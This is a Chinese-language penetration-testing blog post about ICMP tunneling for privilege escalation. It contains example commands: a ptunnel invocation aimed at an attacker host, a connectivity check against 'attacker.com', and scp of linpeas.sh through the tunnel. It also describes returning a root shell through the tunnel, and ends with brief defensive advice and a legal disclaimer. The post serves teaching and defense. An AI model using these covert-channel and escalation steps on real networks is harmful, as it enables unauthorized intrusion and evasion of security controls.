ICMP隧道提权方法

极客

ICMP隧道提权方法详解:一个让人又爱又恨的穿透技巧

嘿,大家好呀!今天咱们来聊一个特别有意思的话题——ICMP隧道提权方法,说实话,我第一次接触这个技术的时候,脑子里全是问号,心想:“这玩意儿真的能行?”结果一研究,哎呦,还真挺妙的!所以今天我就把我踩过的坑、学到的经验,一股脑儿分享给你们,希望对做渗透测试或者网络安全研究的朋友有点帮助。

ICMP隧道提权方法

先搞明白:ICMP隧道到底是个啥?

咱们先别急着说提权,得先把基础打牢,对吧?ICMP,全称是Internet Control Message Protocol,就是我们平时ping命令用的那个协议,你ping一下百度,返回的那个“回复来自xxx”,走的就是ICMP。

那什么叫ICMP隧道呢?简单说,就是把别的数据偷偷塞进ICMP的包里头传出去,因为很多防火墙对ICMP基本是放行的嘛,谁还拦ping啊?所以攻击者就利用这一点,把TCP/UDP的数据封装到ICMP的payload里,实现隐蔽通信。

我第一次看到这个思路的时候,真的拍大腿——太聪明了!你说防火墙把HTTP、SSH都封得死死的,结果ping却能通,这不是明摆着给人留后门嘛,哈哈。

ICMP隧道提权方法,核心思路在哪?

好,重点来了,所谓的ICMP隧道提权方法,其实不是说ICMP本身能提权,而是说——我们通过ICMP隧道建立一条隐蔽通道,然后借助这条通道去执行提权操作。

举个栗子哈,假设你拿到了一台Linux主机的低权限shell,但这台机器处在一个超级严格的内网里,出口只允许ICMP,你想下载一个本地提权exp(比如脏牛、PwnKit啥的),怎么办?常规的wget、curl全废了,这时候,ICMP隧道就派上用场了!

你可以用工具像ptunnel、icmpsh、Hans这些,在攻击机和目标机之间建立一条ICMP隧道,然后呢,通过这条隧道把提权脚本传过去,再通过隧道反弹一个高权限的shell回来,整个过程,防火墙那边看到的只是一堆ping包,嘿嘿,神不知鬼不觉。

不过说真的,这招虽然骚,但速度嘛……emmm,慢得让人想砸键盘,传个几MB的文件,可能得等半天,所以实际用的时候,得有耐心,别急,泡杯茶慢慢等。

具体操作步骤,我尽量说人话

咱们拿一个常见的场景来演示一下,别太理论化,不然听着头大。

第一步,你得先确认目标机器能不能往外ping,这个简单,ping attacker.com试试就知道了,如果通了,恭喜你,有戏。

第二步,在攻击机上启动ICMP隧道服务端,比如说用ptunnel,命令大概是这样的:

ptunnel -p attacker_ip -lp 8000 -da target_ip -dp 22

这意思是,把本地的8000端口通过ICMP隧道,转发到目标机的22端口,这样你就能ssh上去了。

第三步,在目标机上运行客户端,这一步通常需要你已经有低权限的shell了,能执行命令就行。

第四步,通过隧道传提权工具。

scp -P 8000 linpeas.sh user@localhost:/tmp/

然后跑起来,找提权点。

第五步,找到漏洞之后,通过ICMP隧道反弹一个root shell回来,这一步就看你用的exp是啥了,方法很多。

说实话,这一套流程走下来,我第一次成功的时候,激动得差点从椅子上跳起来!但失败的时候也是真的多,经常卡在防火墙那关,或者ICMP被限速,传着传着就断了,气死人。

几个容易踩的坑,提前给你排排雷

坑一:ICMP被限速。 很多网络设备对ICMP包有速率限制,你传大文件的时候,丢包丢到怀疑人生,解决办法嘛,就是压缩文件,越小越好,或者分包重传。

坑二:权限不够。 有些系统要root才能发原始ICMP包(raw socket),如果你只有普通用户权限,可能得先想办法提权到能发raw socket,这就有点鸡生蛋蛋生鸡的意思了,哈哈。

坑三:杀软和EDR。 现代EDR对异常的ICMP流量是有检测的,尤其是payload特别大的那种,所以别傻乎乎地一个包塞几KB,容易被抓。

防御角度也得说两句

咱们做安全的,不能光想着攻击,对吧?从防御角度看,ICMP隧道提权方法其实是有迹可循的。

  • 监控异常大的ICMP包
  • 限制ICMP的速率和payload大小
  • 对内部主机的外发ICMP做严格审计

说真的,很多企业内网对ICMP根本不管,ping来ping去随便得很,这就给了攻击者很大的空间,所以啊,安全无小事,别觉得ping无所谓。

最后唠几句

好了,关于ICMP隧道提权方法,我今天就唠到这儿,这技术吧,说新不新,说老也不老,但在特定场景下真的挺管用,尤其是那种“只通ICMP”的变态网络环境,它简直就是救命稻草。

不过我得提醒一句哈,这些技术一定要在合法授权的前提下使用,别拿去干坏事,不然警察叔叔请喝茶可别怪我没提醒你,嘿嘿。

如果你觉得这篇文章对你有帮助,欢迎常来逛逛,后面我还会写更多关于隧道技术、内网渗透的干货,咱们下篇见啦,拜拜!

文章版权声明:除非注明,否则均为极客网安-咸鱼原创文章,转载或复制请以超链接形式并注明出处。

目录[+]